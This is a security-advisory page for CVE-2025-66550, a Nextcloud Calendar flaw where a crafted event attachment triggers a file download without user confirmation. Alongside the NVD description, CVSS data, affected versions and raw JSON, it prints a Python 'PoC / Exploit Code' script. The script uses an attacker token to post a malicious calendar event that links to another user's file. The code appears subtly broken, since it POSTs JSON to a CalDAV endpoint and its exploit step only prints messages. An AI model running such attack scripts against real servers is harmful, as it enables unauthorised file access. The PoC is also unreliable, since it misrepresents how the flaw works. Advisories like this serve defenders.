Security Vulnerability Report
中文
CVE-2025-66550 CVSS 5.7 MEDIUM

CVE-2025-66550

Published: 2025-12-05 17:16:06
Last Modified: 2025-12-10 14:13:31
Source: [email protected]

Description

Nextcloud Calendar is a calendar app for Nextcloud. Prior to 4.7.17 and 5.2.4, when a malicious user creates a calendar event with a crafted attachment that links to a download link of a file on the same Nextcloud server, the file would be downloaded without the user confirming the action. This vulnerability is fixed in 4.7.17 and 5.2.4.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:* - VULNERABLE
Nextcloud Calendar < 4.7.17
Nextcloud Calendar < 5.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66550 Nextcloud Calendar Attachment Download Security Bypass PoC # This PoC demonstrates the security bypass vulnerability in Nextcloud Calendar import requests import json from urllib.parse import quote TARGET_URL = "https://vulnerable-nextcloud-server.com" ATTACKER_TOKEN = "attacker_auth_token_here" TARGET_FILE_PATH = "/remote.php/dav/files/admin/sensitive_document.pdf" def create_malicious_event(): """ Create a calendar event with a crafted attachment that links to a file on the same Nextcloud server for unauthorized download. """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Malicious attachment pointing to internal server file malicious_attachment = { "filename": "innocent_file.txt", "filesize": 1024, "mimetype": "text/plain", "uri": f"{TARGET_FILE_PATH}", "isAttachment": True } event_data = { "summary": "Team Meeting - Please Review", "description": "Please download the attached agenda", "start": "2025-01-15T10:00:00Z", "end": "2025-01-15T11:00:00Z", "attachments": [malicious_attachment] } # Create calendar event via CalDAV API endpoint = f"{TARGET_URL}/remote.php/dav/calendars/attacker/personal/" response = requests.post(endpoint, headers=headers, json=event_data) if response.status_code == 201: print("[+] Malicious calendar event created successfully") return response.headers.get("Location") else: print(f"[-] Failed to create event: {response.status_code}") return None def exploit_download(): """ When victim views the event and clicks the attachment, the file will be downloaded without confirmation prompt. """ print("[*] Waiting for victim to view the malicious event...") print("[*] When victim clicks the attachment link, file downloads automatically") print("[*] File download occurs WITHOUT user confirmation (security bypass)") if __name__ == "__main__": print("CVE-2025-66550 Nextcloud Calendar Security Bypass PoC") print("=" * 60) event_url = create_malicious_event() if event_url: exploit_download()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66550", "sourceIdentifier": "[email protected]", "published": "2025-12-05T17:16:05.500", "lastModified": "2025-12-10T14:13:30.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Calendar is a calendar app for Nextcloud. Prior to 4.7.17 and 5.2.4, when a malicious user creates a calendar event with a crafted attachment that links to a download link of a file on the same Nextcloud server, the file would be downloaded without the user confirming the action. This vulnerability is fixed in 4.7.17 and 5.2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-241"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.7.17", "matchCriteriaId": "1B86471C-96D9-4152-BD53-8AC98B0C428D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.2.4", "matchCriteriaId": "833B51DE-8445-40F4-A4D4-E7B88F3C2B0C"}]}]}], "references": [{"url": "https://github.com/nextcloud/calendar/commit/63a6c398db01391eb9fd5297a0d4c3d6e614f769", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/calendar/pull/6971", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-f29c-ppmv-8mcv", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3112033", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.